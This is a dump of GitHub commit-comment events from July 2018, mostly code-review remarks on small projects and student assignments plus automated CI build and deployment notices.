{"id":"8010876712","type":"CommitCommentEvent","actor":{"login":"snow212-cn"},"repo":{"name":"alsotang/node-lessons"},"payload":{"comment":{"id":29815840,"position":5,"line":127,"path":"lesson1/README.md","commit_id":"efcf6fd6353b554f9d0b0d4ca0e5f363cfd62268","created_at":"2018-07-24T15:14:07Z","updated_at":"2018-07-24T15:14:07Z","author_association":"NONE","body":"在->再"}},"created_at":"2018-07-24T15:14:07Z"}
{"id":"8010879628","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29815846,"position":61,"line":25834,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T15:14:31Z","updated_at":"2018-07-24T15:14:31Z","author_association":"MEMBER","body":"Ist das nicht zu speziell? Und ziemlich nah am Leck und Lack..."}},"created_at":"2018-07-24T15:14:31Z"}
{"id":"8010889539","type":"CommitCommentEvent","actor":{"login":"PWittix"},"repo":{"name":"PWittix/ITA"},"payload":{"comment":{"id":29815864,"position":null,"line":null,"path":null,"commit_id":"3107ea7f089b1687a94860b7568a1b6f7e88b22d","created_at":"2018-07-24T15:15:57Z","updated_at":"2018-07-24T15:15:57Z","author_association":"OWNER","body":"converted the initial json request from plain js to jquery"}},"created_at":"2018-07-24T15:15:57Z"}
{"id":"8010889613","type":"CommitCommentEvent","actor":{"login":"bfred-it"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29815865,"position":17,"line":6,"path":"source/features/set-default-repositories-type-to-sources.js","commit_id":"0184fafcfdacff4a2778e34242de92b5bdd2c177","created_at":"2018-07-24T15:15:58Z","updated_at":"2018-07-24T15:15:58Z","author_association":"COLLABORATOR","body":"These two selectors can be one, no need to have two `select`"}},"created_at":"2018-07-24T15:15:58Z"}
{"id":"8010890233","type":"CommitCommentEvent","actor":{"login":"snow212-cn"},"repo":{"name":"alsotang/node-lessons"},"payload":{"comment":{"id":29815866,"position":5,"line":127,"path":"lesson1/README.md","commit_id":"ddceff01c253441f2f2a0f352c75b78a8801e21a","created_at":"2018-07-24T15:16:04Z","updated_at":"2018-07-24T15:16:04Z","author_association":"NONE","body":"在→再"}},"created_at":"2018-07-24T15:16:04Z"}
{"id":"8010892368","type":"CommitCommentEvent","actor":{"login":"Mohameday3393"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29815874,"position":null,"line":null,"path":null,"commit_id":"820ed07e8bc5940679b8e5f8febac324effb5822","created_at":"2018-07-24T15:16:23Z","updated_at":"2018-07-24T15:16:23Z","author_association":"NONE","body":"what is this ????????"}},"created_at":"2018-07-24T15:16:23Z"}
{"id":"8010893090","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29815875,"position":null,"line":null,"path":null,"commit_id":"72694bfc9d2a0247f009f6d5cc10df4df58aad1b","created_at":"2018-07-24T15:16:30Z","updated_at":"2018-07-24T15:16:30Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [1913clamav](https://1913clamav-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/clamav](https://1913clamav-static-docs.pantheonsite.io/docs/clamav)\n"}},"created_at":"2018-07-24T15:16:30Z"}
{"id":"8010898729","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29815887,"position":null,"line":null,"path":null,"commit_id":"04bef0f6bbebbbc8966ebe5b37cc44fc86633137","created_at":"2018-07-24T15:17:21Z","updated_at":"2018-07-24T15:17:21Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-47](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-47-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-24T15:17:21Z"}
{"id":"8010898848","type":"CommitCommentEvent","actor":{"login":"Discostu36"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29815888,"position":47,"line":25820,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T15:17:22Z","updated_at":"2018-07-24T15:17:22Z","author_association":"CONTRIBUTOR","body":"Nicht ein Fall für names.txt?"}},"created_at":"2018-07-24T15:17:22Z"}
{"id":"8010899755","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29815890,"position":null,"line":null,"path":null,"commit_id":"cf811144861f348a53a7185ab12dcdc7161d8713","created_at":"2018-07-24T15:17:30Z","updated_at":"2018-07-24T15:17:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Registro SOS): Nuevos campos](https://trello.com/c/dc9uZ9Gn/13-incidentes-featregistro-sos-nuevos-campos)"}},"created_at":"2018-07-24T15:17:30Z"}
{"id":"8010900995","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29815893,"position":null,"line":null,"path":null,"commit_id":"b190cdc5cffa45ee2eaa1641504451bfcf5ced41","created_at":"2018-07-24T15:17:41Z","updated_at":"2018-07-24T15:17:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Registro SOS): Nuevos campos](https://trello.com/c/dc9uZ9Gn/13-incidentes-featregistro-sos-nuevos-campos)"}},"created_at":"2018-07-24T15:17:41Z"}
{"id":"8010908632","type":"CommitCommentEvent","actor":{"login":"louishao"},"repo":{"name":"lyakaap/Kaggle-Carvana-3rd-Place-Solution"},"payload":{"comment":{"id":29815903,"position":9,"line":9,"path":"make_submission.py","commit_id":"874d2f18e080a5c794797c0f4b02e6e6137b2db1","created_at":"2018-07-24T15:18:48Z","updated_at":"2018-07-24T15:18:48Z","author_association":"NONE","body":"`from losses import (\r\n    binary_crossentropy,\r\n    dice_loss,\r\n    bce_dice_loss,\r\n    dice_coef,\r\n    weighted_bce_dice_loss\r\n)`"}},"created_at":"2018-07-24T15:18:48Z"}
{"id":"8010911516","type":"CommitCommentEvent","actor":{"login":"PhilippeBo"},"repo":{"name":"Nikvt/XML-Scrapping-app"},"payload":{"comment":{"id":29815907,"position":13,"line":13,"path":"app/views/partials/_hash.html.erb","commit_id":"c970c40481cbc36f8b1d6f05ec5b62d9c380aa82","created_at":"2018-07-24T15:19:14Z","updated_at":"2018-07-24T15:19:14Z","author_association":"NONE","body":"Do not use each here, you know the `ID` you are looking for 👍 "}},"created_at":"2018-07-24T15:19:14Z"}
{"id":"8010911573","type":"CommitCommentEvent","actor":{"login":"benjgorman"},"repo":{"name":"UniversityInterview/assignment-2-exercises-with-classes-and-objects-student-example"},"payload":{"comment":{"id":29815908,"position":75,"line":75,"path":"Assignment2/Task 3/TicketMachine.java","commit_id":"d8a1f51c67fbc184b09812df25b0aa9cfc9330b5","created_at":"2018-07-24T15:19:15Z","updated_at":"2018-07-24T15:19:15Z","author_association":"NONE","body":"This bit is wrong."}},"created_at":"2018-07-24T15:19:15Z"}
{"id":"8010912527","type":"CommitCommentEvent","actor":{"login":"benjgorman"},"repo":{"name":"UniversityInterview/assignment-2-exercises-with-classes-and-objects-student-example"},"payload":{"comment":{"id":29815910,"position":80,"line":80,"path":"Assignment2/Task 3/TicketMachine.java","commit_id":"d8a1f51c67fbc184b09812df25b0aa9cfc9330b5","created_at":"2018-07-24T15:19:23Z","updated_at":"2018-07-24T15:19:23Z","author_association":"NONE","body":"This bit is also wrong."}},"created_at":"2018-07-24T15:19:23Z"}
{"id":"8010914479","type":"CommitCommentEvent","actor":{"login":"benjgorman"},"repo":{"name":"UniversityInterview/assignment-2-exercises-with-classes-and-objects-student-example"},"payload":{"comment":{"id":29815914,"position":85,"line":85,"path":"Assignment2/Task 3/TicketMachine.java","commit_id":"d8a1f51c67fbc184b09812df25b0aa9cfc9330b5","created_at":"2018-07-24T15:19:41Z","updated_at":"2018-07-24T15:19:41Z","author_association":"NONE","body":"This should be total = balance - previousBalance"}},"created_at":"2018-07-24T15:19:41Z"}
{"id":"8010915158","type":"CommitCommentEvent","actor":{"login":"louishao"},"repo":{"name":"lyakaap/Kaggle-Carvana-3rd-Place-Solution"},"payload":{"comment":{"id":29815915,"position":34,"line":34,"path":"make_submission.py","commit_id":"874d2f18e080a5c794797c0f4b02e6e6137b2db1","created_at":"2018-07-24T15:19:48Z","updated_at":"2018-07-24T15:19:48Z","author_association":"NONE","body":"`model = load_model(filepath='./model_weights.hdf5', custom_objects={'bce_dice_loss': bce_dice_loss, 'dice_coef': dice_coef})`"}},"created_at":"2018-07-24T15:19:48Z"}
{"id":"8010915474","type":"CommitCommentEvent","actor":{"login":"pablofrommars"},"repo":{"name":"srehm/rocksdb-sharp"},"payload":{"comment":{"id":29815916,"position":null,"line":null,"path":null,"commit_id":"b9ca2978747d28a9460cf332ebf1f7e3206ad13e","created_at":"2018-07-24T15:19:51Z","updated_at":"2018-07-24T15:19:51Z","author_association":"NONE","body":"Hi Stefan,\r\n\r\nNot sure if that's the best way to reach out to you, anyway I try ;)\r\n\r\nI have been looking at implementing checkpoints and found your elegant solution. When I try to use you code, I get a NativeImport.NativeLoadException: 'Unable to get address of rocksdb_checkpoint_object_create (IntPtr_IntPtr_IntPtr\\&)'\r\n\r\nWhich version of rocksdb.dll do you use?\r\n\r\nThanks for your work!\r\nPablo\r\n"}},"created_at":"2018-07-24T15:19:51Z"}
{"id":"8010916283","type":"CommitCommentEvent","actor":{"login":"benjgorman"},"repo":{"name":"UniversityInterview/assignment-2-exercises-with-classes-and-objects-student-example"},"payload":{"comment":{"id":29815920,"position":null,"line":null,"path":null,"commit_id":"d8a1f51c67fbc184b09812df25b0aa9cfc9330b5","created_at":"2018-07-24T15:19:58Z","updated_at":"2018-07-24T15:19:58Z","author_association":"NONE","body":"Good, 80/100"}},"created_at":"2018-07-24T15:19:58Z"}
{"id":"8010924059","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29815929,"position":41,"line":123,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"dcd5484ff780dae0370be66abc18c4a631362d86","created_at":"2018-07-24T15:21:10Z","updated_at":"2018-07-24T15:21:10Z","author_association":"NONE","body":"это неправильная технология для \"повторного вызова кода\"\r\nеще раз посмотри скринкаст, там разбирается как при обработке ошибки можно повторно вызвать код, приведший к этой ошибке"}},"created_at":"2018-07-24T15:21:10Z"}
{"id":"8010926827","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29815935,"position":null,"line":null,"path":null,"commit_id":"e410bd71fc2790ab218bcef7a8508fd444fdcb79","created_at":"2018-07-24T15:21:36Z","updated_at":"2018-07-24T15:21:36Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/88"}},"created_at":"2018-07-24T15:21:36Z"}
{"id":"8010928009","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29815937,"position":null,"line":null,"path":null,"commit_id":"46432cf17ee337d4098fa499a786530f1f8a43f6","created_at":"2018-07-24T15:21:46Z","updated_at":"2018-07-24T15:21:46Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 235](http://build.palaso.org/viewLog.html?buildId=125497&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:29"}},"created_at":"2018-07-24T15:21:46Z"}
{"id":"8010929698","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29815942,"position":13,"line":13,"path":"QieGaoWorld/models.py","commit_id":"4baa3d14e61195e5e4d96a59c4893cac32c38d93","created_at":"2018-07-24T15:22:02Z","updated_at":"2018-07-24T15:22:02Z","author_association":"OWNER","body":"Bug fixed.\r\nAvatar will not appeared when created a new account with default avatar url (static\\\\face\\\\default.jpg)\r\n"}},"created_at":"2018-07-24T15:22:02Z"}
{"id":"8010932484","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29815944,"position":null,"line":null,"path":null,"commit_id":"46432cf17ee337d4098fa499a786530f1f8a43f6","created_at":"2018-07-24T15:22:27Z","updated_at":"2018-07-24T15:22:27Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 201](http://build.palaso.org/viewLog.html?buildId=125498&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:12"}},"created_at":"2018-07-24T15:22:27Z"}
{"id":"8010932722","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29815945,"position":null,"line":null,"path":null,"commit_id":"46432cf17ee337d4098fa499a786530f1f8a43f6","created_at":"2018-07-24T15:22:29Z","updated_at":"2018-07-24T15:22:29Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 199](http://build.palaso.org/viewLog.html?buildId=125499&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:02:08"}},"created_at":"2018-07-24T15:22:29Z"}
{"id":"8010939325","type":"CommitCommentEvent","actor":{"login":"louishao"},"repo":{"name":"lyakaap/Kaggle-Carvana-3rd-Place-Solution"},"payload":{"comment":{"id":29815957,"position":34,"line":34,"path":"make_submission.py","commit_id":"874d2f18e080a5c794797c0f4b02e6e6137b2db1","created_at":"2018-07-24T15:23:29Z","updated_at":"2018-07-24T15:23:29Z","author_association":"NONE","body":"Error occurs when load model. If add this, it can run successfully. It would better to add the customer function to the custom_objects."}},"created_at":"2018-07-24T15:23:29Z"}
{"id":"8010939849","type":"CommitCommentEvent","actor":{"login":"nelobaba"},"repo":{"name":"Zetatango/porky_lib"},"payload":{"comment":{"id":29815958,"position":null,"line":null,"path":null,"commit_id":"cb895cc6f74facb80d5c0523025bde0047252102","created_at":"2018-07-24T15:23:34Z","updated_at":"2018-07-24T15:23:34Z","author_association":"NONE","body":"Looks good to me"}},"created_at":"2018-07-24T15:23:34Z"}
{"id":"8010940436","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29815961,"position":7,"line":106,"path":"test/specs/test_admin_route.js","commit_id":"a327da7ab448300b96ef7c6089ce5b28337897d4","created_at":"2018-07-24T15:23:39Z","updated_at":"2018-07-24T15:23:39Z","author_association":"COLLABORATOR","body":"You don't need to be testing whether or not this route is authenticated or not.  That logic is handled by the hapi authentication plugin so you are not actually testing any of your own logic/code by doing this.  You can bypass the route authentication strategy by passing in credentials as part of the request options.  See [here](https://github.com/hotosm/oam-api/blob/develop/test/specs/test_dronedeploy.js#L98) and [here](https://github.com/hapijs/discuss/issues/214) for more information on this."}},"created_at":"2018-07-24T15:23:39Z"}
{"id":"8010940653","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29815965,"position":35,"line":104,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"dcd5484ff780dae0370be66abc18c4a631362d86","created_at":"2018-07-24T15:23:41Z","updated_at":"2018-07-24T15:23:41Z","author_association":"NONE","body":"отвечаю на твой вопрос \"почему программа возвращает ошибку при попытке создания вагона или поезда?\"\r\nпосмотри на строку 112 и подумай, что у тебя будет в переменной `number_train`\r\nи посмотри мои комментарии про эту же ошибку в процессе \"сидинга\" (автоматического созадния объектов)\r\nв этих комментариях уже есть ответ на твой вопрос"}},"created_at":"2018-07-24T15:23:41Z"}
{"id":"8010984566","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29816047,"position":78,"line":78,"path":"tests/vcs/git/GitCommitMetadataBearTest.py","commit_id":"389e6ecb7602c0f37d3ef8ed3f0a657b2e2634e6","created_at":"2018-07-24T15:30:20Z","updated_at":"2018-07-24T15:30:20Z","author_association":"NONE","body":"This doesn't trigger the `RuntimeError`. To trigger it you can create a new temp directory that's not a git repository here, and execute the `get_head_commit` from a `GitCommitMetadataBear` object"}},"created_at":"2018-07-24T15:30:20Z"}
{"id":"8010988757","type":"CommitCommentEvent","actor":{"login":"nstang"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29816055,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-24T15:30:57Z","updated_at":"2018-07-24T15:30:57Z","author_association":"NONE","body":"@h52s\r\n\r\nmytv api help me!"}},"created_at":"2018-07-24T15:30:57Z"}
{"id":"8010990399","type":"CommitCommentEvent","actor":{"login":"CrimsonVortex"},"repo":{"name":"CrimsonVortex/Userscript-Plus"},"payload":{"comment":{"id":29816058,"position":null,"line":null,"path":null,"commit_id":"6d197da303c6eec8c8e45b8e1045e9b1bd8a0224","created_at":"2018-07-24T15:31:12Z","updated_at":"2018-07-24T15:31:12Z","author_association":"OWNER","body":"qwef"}},"created_at":"2018-07-24T15:31:12Z"}
{"id":"8010991092","type":"CommitCommentEvent","actor":{"login":"godmoves"},"repo":{"name":"godmoves/HappyGo"},"payload":{"comment":{"id":29816060,"position":null,"line":null,"path":null,"commit_id":"9ced2e404f559efc1b2d9a46bfeeafbae5cd1260","created_at":"2018-07-24T15:31:19Z","updated_at":"2018-07-24T15:31:19Z","author_association":"OWNER","body":"I do not want to record these `SystemExit` things.\r\nRefer to https://stackoverflow.com/questions/730764/how-to-properly-ignore-exceptions"}},"created_at":"2018-07-24T15:31:19Z"}
{"id":"8010992746","type":"CommitCommentEvent","actor":{"login":"dutiyesh"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29816062,"position":17,"line":6,"path":"source/features/set-default-repositories-type-to-sources.js","commit_id":"0184fafcfdacff4a2778e34242de92b5bdd2c177","created_at":"2018-07-24T15:31:35Z","updated_at":"2018-07-24T15:31:35Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-24T15:31:35Z"}
{"id":"8010994046","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29816064,"position":22,"line":121,"path":"test/specs/test_admin_route.js","commit_id":"a327da7ab448300b96ef7c6089ce5b28337897d4","created_at":"2018-07-24T15:31:47Z","updated_at":"2018-07-24T15:31:47Z","author_association":"COLLABORATOR","body":"We don't need deep equal here since we are testing simple value equivalence."}},"created_at":"2018-07-24T15:31:47Z"}
{"id":"8010995954","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29816067,"position":44,"line":143,"path":"test/specs/test_admin_route.js","commit_id":"a327da7ab448300b96ef7c6089ce5b28337897d4","created_at":"2018-07-24T15:32:05Z","updated_at":"2018-07-24T15:32:05Z","author_association":"COLLABORATOR","body":"We don't need deep equal here."}},"created_at":"2018-07-24T15:32:05Z"}
{"id":"8010997612","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29816070,"position":61,"line":25834,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T15:32:21Z","updated_at":"2018-07-24T15:32:21Z","author_association":"MEMBER","body":"Schon, aber ist Lick nicht auch *sehr* selten? Wie viele Leute haben das überhaupt in ihrem Wortschatz? Ich jedenfalls nicht."}},"created_at":"2018-07-24T15:32:21Z"}
{"id":"8010999855","type":"CommitCommentEvent","actor":{"login":"sonphanonline"},"repo":{"name":"sonphanonline/chatapp"},"payload":{"comment":{"id":29816073,"position":14,"line":107,"path":"index.html","commit_id":"aba64682054d2caa4ceecd255c46fb4e8cb07546","created_at":"2018-07-24T15:32:41Z","updated_at":"2018-07-24T15:32:41Z","author_association":"OWNER","body":"it's fine."}},"created_at":"2018-07-24T15:32:41Z"}
{"id":"8011002747","type":"CommitCommentEvent","actor":{"login":"j-morel"},"repo":{"name":"j-morel/jmp"},"payload":{"comment":{"id":29816082,"position":null,"line":null,"path":null,"commit_id":"c0ffde0eb3947a35fbfdf75fe433bf231252058d","created_at":"2018-07-24T15:33:09Z","updated_at":"2018-07-24T15:33:09Z","author_association":"OWNER","body":"These changes occurred after changing the window size and using the 'reformat script' option in JMP."}},"created_at":"2018-07-24T15:33:09Z"}
{"id":"8011013472","type":"CommitCommentEvent","actor":{"login":"malixsys"},"repo":{"name":"bgold0/nextjs-auth-skeleton"},"payload":{"comment":{"id":29816103,"position":null,"line":null,"path":null,"commit_id":"c47e2dac76cf0e195f98ce8bfc09aff9b12e8e53","created_at":"2018-07-24T15:34:47Z","updated_at":"2018-07-24T15:34:47Z","author_association":"NONE","body":"You could implement an example API server here with the two endpoints you mention in the `readme.md`..."}},"created_at":"2018-07-24T15:34:47Z"}
{"id":"8011015489","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"Buzyuka/algorithms_lesson"},"payload":{"comment":{"id":29816105,"position":1,"line":1,"path":"a1.py","commit_id":"a591bd1982abe34037039e29392c5cd46aab1db4","created_at":"2018-07-24T15:35:07Z","updated_at":"2018-07-24T15:35:07Z","author_association":"NONE","body":"Вывода от вас нет.\r\nНо судя по данным с сортировкой чуть быстрее))) "}},"created_at":"2018-07-24T15:35:07Z"}
{"id":"8011016439","type":"CommitCommentEvent","actor":{"login":"Tosuke"},"repo":{"name":"TeamKitten/OfficialWeb"},"payload":{"comment":{"id":29816109,"position":null,"line":null,"path":null,"commit_id":"2c773a87735b87fb99b0b7dad2da4fde1e2508e4","created_at":"2018-07-24T15:35:15Z","updated_at":"2018-07-24T15:35:15Z","author_association":"CONTRIBUTOR","body":"🤔"}},"created_at":"2018-07-24T15:35:15Z"}
{"id":"8011018393","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29816111,"position":35,"line":35,"path":"meikai_java2018_05/src/e_03/e_03_02.java","commit_id":"8b6f351b67978a2ac9a0ad5628290eac100b36a0","created_at":"2018-07-24T15:35:34Z","updated_at":"2018-07-24T15:35:34Z","author_association":"COLLABORATOR","body":"こちらelseの書き方を指摘しましたが、このソースにも反映させていただきたいです。\r\n佐藤"}},"created_at":"2018-07-24T15:35:34Z"}
{"id":"8011018630","type":"CommitCommentEvent","actor":{"login":"alaviss"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29816112,"position":13,"line":13,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-24T15:35:36Z","updated_at":"2018-07-24T15:35:36Z","author_association":"CONTRIBUTOR","body":"It's in the [Guidelines](https://github.com/haikuports/haikuports/wiki/HaikuPorter-Guidelines). They are not **that** important, but should still be followed."}},"created_at":"2018-07-24T15:35:36Z"}
{"id":"8011021125","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29816118,"position":30,"line":30,"path":"meikai_java2018_05/src/e_03/e_03_02.java","commit_id":"8b6f351b67978a2ac9a0ad5628290eac100b36a0","created_at":"2018-07-24T15:36:00Z","updated_at":"2018-07-24T15:36:00Z","author_association":"COLLABORATOR","body":"インデントがあっていないようです。調整願えますか\r\n佐藤"}},"created_at":"2018-07-24T15:36:00Z"}
{"id":"8011021336","type":"CommitCommentEvent","actor":{"login":"sluger"},"repo":{"name":"datavisyn/chartjs-chart-box-and-violin-plot"},"payload":{"comment":{"id":29816119,"position":5,"line":55,"path":"README.md","commit_id":"1fc3fb6fe5b070d62ef416b4ac9407c0c11caed0","created_at":"2018-07-24T15:36:02Z","updated_at":"2018-07-24T15:36:02Z","author_association":"MEMBER","body":"sorry, i may have introduced this when resolving merge conflicts"}},"created_at":"2018-07-24T15:36:02Z"}
{"id":"8011023916","type":"CommitCommentEvent","actor":{"login":"benjgorman"},"repo":{"name":"UniversityInterview/assignment-2-exercises-with-classes-and-objects-student-example"},"payload":{"comment":{"id":29816122,"position":45,"line":45,"path":"Assignment2/task 2/Practical.java","commit_id":"d8a1f51c67fbc184b09812df25b0aa9cfc9330b5","created_at":"2018-07-24T15:36:27Z","updated_at":"2018-07-24T15:36:27Z","author_association":"NONE","body":"You have not initialised all of your variables.\r\n`y = 50;\r\nz=60;`"}},"created_at":"2018-07-24T15:36:27Z"}
{"id":"8011024151","type":"CommitCommentEvent","actor":{"login":"vrindanayak"},"repo":{"name":"dcm4che/dcm4chee-arc-light"},"payload":{"comment":{"id":29816123,"position":null,"line":null,"path":null,"commit_id":"67f0ecb20327f534ce4ef8200f5ba5432a7f6710","created_at":"2018-07-24T15:36:30Z","updated_at":"2018-07-24T15:36:30Z","author_association":"MEMBER","body":"Series.SCHEDULE_METADATA_UPDATE_FOR_SERIES (removed as part of this commit) is still being referenced in DeletionServiceEJB"}},"created_at":"2018-07-24T15:36:30Z"}
{"id":"8011026513","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29816129,"position":12,"line":49,"path":"test/remittance.js","commit_id":"14c15594afebb495e943b67ae4448ce49892d5e3","created_at":"2018-07-24T15:36:53Z","updated_at":"2018-07-24T15:36:53Z","author_association":"NONE","body":"`return RemittanceFactory.new(...`.\r\n\r\nIf you expanded the:\r\n\r\n```javascript\r\n.then( (instance)  => {\r\n    remittance = instance\r\n    RemittanceFactory.new(instance.address, { from: admin })})\r\n.then( (instance) => {\r\n```\r\nInto:\r\n```javascript\r\n.then(function(instance) { // <-- this function here\r\n    remittance = instance\r\n    RemittanceFactory.new(instance.address, { from: admin })})\r\n.then( (instance) => {\r\n```\r\nThe `function` takes a parameter and returns something, either a value or a promise. If a promise, the `.then` it was called in will resolve it before passing on.\r\nBut if you leave your promise `RemittanceFactory.new(` orphan in the scope of the function, this promise is lost."}},"created_at":"2018-07-24T15:36:53Z"}
{"id":"8011029877","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"Buzyuka/algorithms_lesson"},"payload":{"comment":{"id":29816137,"position":1,"line":1,"path":"a2.py","commit_id":"f92f32889ac2513a12be560315299b900ed479ad","created_at":"2018-07-24T15:37:25Z","updated_at":"2018-07-24T15:37:25Z","author_association":"NONE","body":"О, гипотеза подтвердилась. Один цикл в классике примерно в 2 раза быстрее, чем 2 lambda.\r\nНадеюсь вы сделали такой же вывод."}},"created_at":"2018-07-24T15:37:25Z"}
{"id":"8011035755","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29816144,"position":null,"line":null,"path":null,"commit_id":"22ca48a8b05249765decc9a0a80db91133997057","created_at":"2018-07-24T15:38:21Z","updated_at":"2018-07-24T15:38:21Z","author_association":"COLLABORATOR","body":"You should be able to add debug points to see at what point it is failing. Presumably this is after the loading of the database.php file, in which case the path isn't right."}},"created_at":"2018-07-24T15:38:21Z"}
{"id":"8011036161","type":"CommitCommentEvent","actor":{"login":"aaronoah"},"repo":{"name":"aaronoah/kibana_calendar_vis"},"payload":{"comment":{"id":29816146,"position":null,"line":null,"path":null,"commit_id":"747b75687849c3f458e8981403c0e2a6b7cbebd6","created_at":"2018-07-24T15:38:25Z","updated_at":"2018-07-24T15:38:25Z","author_association":"OWNER","body":"It will change as I finish all the tests, and yes I'll provide a packaged plugin. After releasing, I would check the actual compatibility with branch 6.x to determine the lowest supported version"}},"created_at":"2018-07-24T15:38:25Z"}
{"id":"8011038408","type":"CommitCommentEvent","actor":{"login":"RajanMistry88"},"repo":{"name":"RajanMistry88/Optical--Character-Reorganisation-OCR-Using-ASP.MVC"},"payload":{"comment":{"id":29816147,"position":null,"line":null,"path":null,"commit_id":"d2e1f496f6e9e06440ed5eb7acff017badefa554","created_at":"2018-07-24T15:38:47Z","updated_at":"2018-07-24T15:38:47Z","author_association":"OWNER","body":"OCR For Asp.net C# or VB.net  \r\nvisit: https://www.aspsnippets.com/Articles/Read-Extract-Text-from-Image-OCR-in-ASPNet-using-C-and-VBNet.aspx"}},"created_at":"2018-07-24T15:38:47Z"}
